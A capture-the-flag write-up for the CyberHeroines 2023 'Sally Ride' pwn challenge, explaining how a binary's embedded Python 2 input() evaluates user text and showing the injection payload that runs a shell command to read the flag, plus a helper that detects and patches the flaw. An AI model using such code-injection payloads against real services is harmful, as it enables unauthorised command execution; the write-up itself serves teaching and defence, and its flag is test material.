# CyberHeroines 2023

## Sally Ride

> [Sally Kristen Ride](https://en.wikipedia.org/wiki/Sally_Ride) (May 26, 1951
> – July 23, 2012) was an American astronaut and physicist. Born in Los
> Angeles, she joined NASA in 1978, and in 1983 became the first American
> woman and the third woman to fly in space, after cosmonauts Valentina
> Tereshkova in 1963 and Svetlana Savitskaya in 1982. She was the youngest
> American astronaut to have flown in space, having done so at the age of 32.
> - [Wikipedia Entry](https://en.wikipedia.org/wiki/Sally_Ride)  
>  
> Chal: I asked ChatGPT to build this binary to honor my hero, the [first
> American woman](https://www.youtube.com/watch?v=jwu-zSdNiLI) in space, but
> it's broken and I cannot seem to figure out why. Connect to `0.cloud.chals.io
> 10568` and help me return the flag.  
>  
> Author: [TJ](https://www.tjoconnor.org/)  
>  
> [`chal.bin`](https://raw.githubusercontent.com/D13David/ctf-writeups/main/cyberheroines23/pwn/sally_ride/chal.bin)

Tags: _pwn_

## Solution

We get a binary for this challenge. Let's see what's going on. The `main` is
very short: it uses the [Python/C API](https://docs.python.org/3/c-api/index.html)
to run an embedded Python script.

```c
/* decompiler output of chal.bin's main() */
undefined8 main(void)
{
  logo();
  Py_Initialize();
  PyRun_SimpleStringFlags(
      "def main():\n"
      "    superhero_name = input(\"Who is your hero >>> \")\n"
      "    print(\"Your hero name is:\", superhero_name)\n"
      "\n"
      "if __name__ == \"__main__\":\n"
      "    main()\n",
      0);
  Py_Finalize();
  return 0;
}
```

The embedded Python script is also very short. Interestingly, the input prompt
gives us the possibility to inject Python code: the binary embeds a Python 2
interpreter, and in Python 2 `input()` is `eval(raw_input())`, so whatever is
typed at the prompt is evaluated as a Python expression rather than stored as a
string.

```python
def main():
    superhero_name = input("Who is your hero >>> ")
    print("Your hero name is:", superhero_name)

if __name__ == "__main__":
    main()
```

What we can do is input `__import__('os').system('cat flag.txt')` as the
superhero name; Python happily evaluates the expression, `os.system` prints the
flag, and only its exit status `0` ends up in `superhero_name` (which is why the
last line of output is the tuple `('Your hero name is:', 0)`, printed by Python
2's `print` statement).
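The root cause is the Python 2 `input()` semantics described above. As an added example (not part of the original writeup or the challenge binary), the following Python 3 script models the vulnerable and the safe prompt semantics side by side, scans an embedded script for bare `input()` calls, and rewrites them to `raw_input()`, which is the fix the author would need; the script text is copied from the decompiled `main`, all function names are constructed here.

```python
import ast

# Copy of the script embedded in chal.bin, taken from the decompiled main().
EMBEDDED_SCRIPT = (
    'def main():\n'
    '    superhero_name = input("Who is your hero >>> ")\n'
    '    print("Your hero name is:", superhero_name)\n'
    '\n'
    'if __name__ == "__main__":\n'
    '    main()\n'
)


def py2_input(line):
    """Model of Python 2's input(): equivalent to eval(raw_input()), so the
    text typed at the prompt is evaluated as a Python expression."""
    return eval(line)  # vulnerable semantics, kept only to show the contrast


def raw_input_model(line):
    """Model of Python 2's raw_input() / Python 3's input(): the text is
    returned unchanged as a string and never evaluated."""
    return line


def find_input_calls(source):
    """Flag every bare input() call in an embedded script; under a Python 2
    interpreter each one evaluates attacker-controlled text."""
    tree = ast.parse(source)
    return [node.lineno for node in ast.walk(tree)
            if isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id == "input"]


class _RenameInput(ast.NodeTransformer):
    """Rename the bare name `input` to `raw_input` (hypothetical helper)."""
    def visit_Name(self, node):
        if node.id == "input":
            return ast.copy_location(ast.Name(id="raw_input", ctx=node.ctx), node)
        return node


def patch_for_py2(source):
    """Rewrite input() to raw_input() so a Python 2 interpreter no longer
    evaluates the prompt response. Requires Python 3.9+ for ast.unparse."""
    tree = _RenameInput().visit(ast.parse(source))
    return ast.unparse(ast.fix_missing_locations(tree))
```

Running `find_input_calls` on the embedded script reports line 2, and after `patch_for_py2` the scan is empty.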

```bash
$ nc 0.cloud.chals.io 10568
--------------------------------------------------------------------------------

[ASCII-art logo omitted]

--------------------------------------------------------------------------------
I would like to be remembered as someone who was not afraid to do what
she wanted to do, and as someone who took risks along the way in order to
achieve her goals. - Dr. Sally Ride
--------------------------------------------------------------------------------
Who is your hero >>> __import__('os').system('cat flag.txt')
chctf{u_cant_B_Wh4t_u_caNT_S33}
('Your hero name is:', 0)
```

Flag `chctf{u_cant_B_Wh4t_u_caNT_S33}`

Original writeup (https://github.com/D13David/ctf-writeups/blob/main/cyberheroines23/pwn/sally_ride/README.md).